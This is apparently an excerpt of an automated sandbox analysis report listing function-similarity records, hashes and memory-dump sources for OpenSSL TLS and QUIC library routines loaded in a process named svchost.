                                                                                              • API ID: R_newR_set_debug$Y_is_a$J_nid2sn$J_nid2lnR_vset_error
                                                                                              • String ID: ssl3_check_cert_and_algorithm$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 75950454-762223334
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_process_change_cipher_spec
                                                                                              • API String ID: 4275876640-357517272
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_early_data
                                                                                              • API String ID: 193678381-3720901860
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Master-Key:$%02X$RSA $Session-ID:
                                                                                              • API String ID: 4098839300-1878088908
                                                                                              Similarity
                                                                                              • API ID: L_sk_pop$L_sk_new_nullL_sk_pushR_newR_set_debugR_set_errorT_free
                                                                                              • String ID: ct_move_scts$ssl\ssl_lib.c
                                                                                              • API String ID: 2898183876-1945711875
                                                                                              Similarity
                                                                                              • API ID: O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Token: $<zero length token>$New token
                                                                                              • API String ID: 1322637139-1505068329
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Fin)
                                                                                              • API String ID: 3964688267-4176003718
                                                                                              • Opcode ID: 6c1b773e76431031572140e2b9498ae3c8577f046698832ea47780813a54f7ea
                                                                                              • Instruction ID: f7a688e55b9c0a16b91a406513585d849cf2bb46aedb0b0c7d19f605ec1b9619
                                                                                              • Opcode Fuzzy Hash: 6c1b773e76431031572140e2b9498ae3c8577f046698832ea47780813a54f7ea
                                                                                              • Instruction Fuzzy Hash: A91152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off)
                                                                                              • API String ID: 3964688267-2743656729
                                                                                              • Opcode ID: d683bd9cf68c721bf02318fd61ad0a203fd3004a5d81cf29e164dbd4d0d02ef4
                                                                                              • Instruction ID: e88392307c0048c3556a14af168ade8f37bf8c7877acabd167746f282f7bedd2
                                                                                              • Opcode Fuzzy Hash: d683bd9cf68c721bf02318fd61ad0a203fd3004a5d81cf29e164dbd4d0d02ef4
                                                                                              • Instruction Fuzzy Hash: AA1152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Len)
                                                                                              • API String ID: 3964688267-4170081695
                                                                                              • Opcode ID: 36c5b77e84433ce9e4e8c1474984c7c447a533362a8d88f0135a06375218057e
                                                                                              • Instruction ID: 723dd4476fd6ac4bc5163a1b8b6201d3d4c488be6ca03ee8149484faeaa4d25a
                                                                                              • Opcode Fuzzy Hash: 36c5b77e84433ce9e4e8c1474984c7c447a533362a8d88f0135a06375218057e
                                                                                              • Instruction Fuzzy Hash: 9C1152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Len, Fin)
                                                                                              • API String ID: 3964688267-755667354
                                                                                              • Opcode ID: dd470031f8fbef8c9c4dc14bbd52003ccb844931b9e1b30c8342e81f843339c0
                                                                                              • Instruction ID: f0d22de474692114d198669ff5ff07691d1e148e96963c730e0a28f9ff4fe02a
                                                                                              • Opcode Fuzzy Hash: dd470031f8fbef8c9c4dc14bbd52003ccb844931b9e1b30c8342e81f843339c0
                                                                                              • Instruction Fuzzy Hash: 681152E1E4A65380FE26DBB5D8613FC2760AF45788F549036DE2E175B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off, Fin)
                                                                                              • API String ID: 3964688267-743771625
                                                                                              • Opcode ID: 53ccaccf77185675b2e856e8cb6b3e6990cebd259b45082fefa23536fb91da59
                                                                                              • Instruction ID: 07cc9d894d1f728a8ab9e3470e92dc249a86adbdc5a92b4c8de3b645ebfcbde5
                                                                                              • Opcode Fuzzy Hash: 53ccaccf77185675b2e856e8cb6b3e6990cebd259b45082fefa23536fb91da59
                                                                                              • Instruction Fuzzy Hash: F61152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off, Len)
                                                                                              • API String ID: 3964688267-741583600
                                                                                              • Opcode ID: bf21fdf185826fa51263c15b4f18a555875111d825e4fd196e8d8daf15974131
                                                                                              • Instruction ID: a798f535dc22b7eee9667e25c3431cb69b4e3f5054ebcd3a1281fe4d2eef1e61
                                                                                              • Opcode Fuzzy Hash: bf21fdf185826fa51263c15b4f18a555875111d825e4fd196e8d8daf15974131
                                                                                              • Instruction Fuzzy Hash: 781152E1E4A65380FE26DBB5D8613FC1760AF45788F449036DE2E175B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$ Stream id: %llu$ (Off, Len, Fin)
                                                                                              • API String ID: 3964688267-815063566
                                                                                              • Opcode ID: 91d637f4aae3752cebe6cbd6d38d90801f6dc67eabb4ba6ce6385815b6992a77
                                                                                              • Instruction ID: 39bcc6c9af4e08beb4c33458048eff7f970af80c1d77a1647dc717e1acdcfac1
                                                                                              • Opcode Fuzzy Hash: 91d637f4aae3752cebe6cbd6d38d90801f6dc67eabb4ba6ce6385815b6992a77
                                                                                              • Instruction Fuzzy Hash: 6B1152E1E4A65390FE26DBB1D8513FC2760AF45798F449036DE2D176B6DE3CE4868300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printf$O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ App Protocol Error Code: %llu$ Final size: %llu$ Stream id: %llu$Reset stream
                                                                                              • API String ID: 3508759399-1770620147
                                                                                              • Opcode ID: 70d345d178550aaad9d0c406ae69edbd367613dc75700494bee0849a220fe693
                                                                                              • Instruction ID: 17239f462b88996550306df908baea89b0d5e845e0d8ef7ac46ab704c629c1d9
                                                                                              • Opcode Fuzzy Hash: 70d345d178550aaad9d0c406ae69edbd367613dc75700494bee0849a220fe693
                                                                                              • Instruction Fuzzy Hash: C9012DE1E4A75390FE26EB75E9612FD1760AF45794F449036DE2E076A6DE3CE0868300
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateEvent
                                                                                              • String ID:
                                                                                              • API String ID: 1576368186-0
                                                                                              • Opcode ID: 3a8f0e5f485a57a8fd7ad16dca34b9265d8dc5cd446898dcf4c0c6ed55fd24e3
                                                                                              • Instruction ID: 322aad4d60bda52f91d0dd0aacbc613f080a5a7f86a1d1e06db62ca80e90a9de
                                                                                              • Opcode Fuzzy Hash: 3a8f0e5f485a57a8fd7ad16dca34b9265d8dc5cd446898dcf4c0c6ed55fd24e3
                                                                                              • Instruction Fuzzy Hash: 2C519A3229165086EB158F75E80475E33A9FB89BBCF244325DE298B7D8DF39C886C350
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_indent
                                                                                              • String ID: No extensions$extensions, extype = %d, extlen = %d$extensions, length = %d
                                                                                              • API String ID: 3358443131-3081145182
                                                                                              • Opcode ID: 95592bc04ea74deb72a3172617bde5129a03d8bd8dee081b65f7ef57a1859369
                                                                                              • Instruction ID: 63c20651bf4ae177cbf18360c30728bd87f7427cb4b3f7aafdfb02c119166610
                                                                                              • Opcode Fuzzy Hash: 95592bc04ea74deb72a3172617bde5129a03d8bd8dee081b65f7ef57a1859369
                                                                                              • Instruction Fuzzy Hash: 744112B3A1A29246EB22CB31E8001697BA4FB85794F08C131EEEC03B65EF3CD465C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_writeR_vset_error
                                                                                              • String ID: ssl3_finish_mac$ssl\s3_enc.c
                                                                                              • API String ID: 4154431231-3730779252
                                                                                              • Opcode ID: d47c5098d58e01f3ea8272b0cf0ab98142f293724266686d08e1ff59bfbdd8bb
                                                                                              • Instruction ID: 9aaac6491fb0b4822c312c30ddf0ebaaf251c521452b868c5c3ead913424e55a
                                                                                              • Opcode Fuzzy Hash: d47c5098d58e01f3ea8272b0cf0ab98142f293724266686d08e1ff59bfbdd8bb
                                                                                              • Instruction Fuzzy Hash: 4F2183A1F1E14241FBA2E772F9926FD1350AF84780F448536EE3D876B2EE6CE5858701
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$O_new
                                                                                              • String ID: SSL_set_fd$ssl\ssl_lib.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlR_vset_errorX_copy_exX_freeX_new
                                                                                              • String ID: ssl\statem\statem_lib.c$tls13_save_handshake_digest_for_pha
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrlO_freeO_newO_s_fileR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_SESSION_print_fp$ssl\ssl_txt.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrlO_freeO_newO_s_memR_newR_set_debugR_vset_errorX_free
                                                                                              • String ID: ssl3_init_finished_mac$ssl\s3_enc.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Streams: %llu$ (Bidi)$ (Uni)$Max streams
                                                                                              APIs
                                                                                              • X509_get_subject_name.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4AC
                                                                                              • X509_NAME_dup.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4B9
                                                                                              • OPENSSL_sk_find.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4CC
                                                                                              • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4D8
                                                                                              • OPENSSL_sk_push.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4E5
                                                                                              • OSSL_STORE_INFO_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4F1
                                                                                              • OSSL_STORE_eof.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4F9
                                                                                              • ERR_clear_error.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C506
                                                                                              • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C510
                                                                                              • OSSL_STORE_close.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C51B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_$E_free$E_closeE_dupE_eofL_sk_findL_sk_pushO_freeR_clear_errorX509_get_subject_name
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB46612C,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB42699C
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB46612C,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB4269B4
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,00007FFBAB46612C,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB4269C4
                                                                                              • ASYNC_get_current_job.LIBCRYPTO-3-X64 ref: 00007FFBAB426A1B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_do_handshake$expect_quic$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$O_zalloc
                                                                                              • String ID: dtls_new_record_layer$ssl\record\methods\dtls_meth.c
                                                                                              APIs
                                                                                              • EVP_MD_CTX_new.LIBCRYPTO-3-X64 ref: 00007FFBAB4429EB
                                                                                              • EVP_DigestInit_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A20
                                                                                              • EVP_DigestUpdate.LIBCRYPTO-3-X64 ref: 00007FFBAB442A46
                                                                                              • EVP_DigestFinal_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A63
                                                                                              • EVP_DigestInit_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A79
                                                                                              • EVP_DigestFinal_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A93
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_MD_get0_name.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435A0
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435B8
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435D4
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435EC
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435FD
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443605
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443641
